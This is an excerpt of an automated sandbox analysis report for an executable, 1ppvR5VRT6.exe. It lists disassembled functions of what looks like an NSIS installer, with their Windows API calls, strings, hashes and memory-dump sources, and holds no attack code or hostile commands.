                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: Call$N$nB@
                              • API String ID: 3103080414-3023683851
                              • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                              • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                              • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                              • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                              • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                              • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                              • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                              • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                              • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                              • wsprintfA.USER32 ref: 00405D7D
                              • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                              • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                              • GlobalFree.KERNEL32(00000000), ref: 00405E66
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00405C36
                                • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]
                              • API String ID: 2171350718-1727408572
                              • Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                              • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                              • Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                              • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                              APIs
                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1ppvR5VRT6.exe",75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                              • CharNextA.USER32(?,"C:\Users\user\Desktop\1ppvR5VRT6.exe",75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                              • CharPrevA.USER32(?,?,75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                              Strings
                              • "C:\Users\user\Desktop\1ppvR5VRT6.exe", xrefs: 0040633F
                              • *?|<>/":, xrefs: 0040634B
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406304
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: "C:\Users\user\Desktop\1ppvR5VRT6.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 589700163-2000852522
                              • Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                              • Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
                              • Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                              • Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD
                              APIs
                              • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                              • GetSysColor.USER32(00000000), ref: 004041FA
                              • SetTextColor.GDI32(?,00000000), ref: 00404206
                              • SetBkMode.GDI32(?,?), ref: 00404212
                              • GetSysColor.USER32(?), ref: 00404225
                              • SetBkColor.GDI32(?,?), ref: 00404235
                              • DeleteObject.GDI32(?), ref: 0040424F
                              • CreateBrushIndirect.GDI32(?), ref: 00404259
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                              • Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
                              • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                              • Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64
                              APIs
                                • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                              • GlobalFree.KERNEL32(?), ref: 100024B3
                              • GlobalFree.KERNEL32(00000000), ref: 100024ED
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                              • Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
                              • Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                              • Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
                              APIs
                              • DestroyWindow.USER32(00000000,00000000), ref: 00402D11
                              • GetTickCount.KERNEL32 ref: 00402D2F
                              • wsprintfA.USER32 ref: 00402D5D
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                              • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                • Part of subcall function 00402CDD: MulDiv.KERNEL32(00000000,00000064,0000129A), ref: 00402CF2
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                              • String ID: ... %d%%
                              • API String ID: 722711167-2449383134
                              • Opcode ID: 49248589531ca63bd1f6eb350bee73914f18f328555d002f4c75c07f849debaa
                              • Instruction ID: 05ae4936d853d48bc68e56bc5a14e51e8e164cb381f888baae312624535d0e7d
                              • Opcode Fuzzy Hash: 49248589531ca63bd1f6eb350bee73914f18f328555d002f4c75c07f849debaa
                              • Instruction Fuzzy Hash: 3601D630901620EBD722AB60BF0CEDE7A78EF48701B44003BF555B51E4CBB84C41CA9E
                              APIs
                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                              • GetMessagePos.USER32 ref: 00404AAE
                              • ScreenToClient.USER32(?,?), ref: 00404AC8
                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction ID: d6f0acc73841e927dc0e8d5cbc3229ede44acf808998aa5f41192725d6cd764a
                              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction Fuzzy Hash: 03019275900219BADB00DB95CD81BFFBBBCAF45711F10012BBA10B61C0C7B495018F94
                              APIs
                              • GetDC.USER32(?), ref: 00401D98
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                              • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                              • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID: Times New Roman
                              • API String ID: 3808545654-927190056
                              • Opcode ID: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                              • Instruction ID: bb5471ef097cc8c5e92714fe4b65473af6cf7b7baf5f4d2141323caa5fcdcc79
                              • Opcode Fuzzy Hash: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                              • Instruction Fuzzy Hash: D4014C72944240AFE7006BB5AE5AA997FE8DB55305F10C839F241BA2F2CB7805458FAD
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                              • wsprintfA.USER32 ref: 00402CB0
                              • SetWindowTextA.USER32(?,?), ref: 00402CC0
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                              • API String ID: 1451636040-1158693248
                              • Opcode ID: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                              • Instruction ID: dd36d9f71d3f98b31449e9fd5fd6fbb92ab2983ffa1af0ce52afe90c4e52f268
                              • Opcode Fuzzy Hash: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                              • Instruction Fuzzy Hash: B6F03C7150020CFBEF209F61CE0ABAE7769EB44344F00803AFA16B52D0DBB999559F99
                              APIs
                              • GlobalFree.KERNEL32(00000000), ref: 10002348
                                • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                              • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                              • GlobalFree.KERNEL32(00000000), ref: 100022FE
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                              • String ID:
                              • API String ID: 3730416702-0
                              • Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                              • Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
                              • Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                              • Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                              • GlobalFree.KERNEL32(?), ref: 004027E5
                              • GlobalFree.KERNEL32(00000000), ref: 004027F8
                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                              • Instruction ID: 2027d9f4b10c536beff5d97c30926d1382b99fb2686dd4663458e7dd77d5dad7
                              • Opcode Fuzzy Hash: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                              • Instruction Fuzzy Hash: C5219C71800128BBDF216FA5DE49DAE7A79EF05324F14423EF524762E1CA794D418FA8
                              APIs
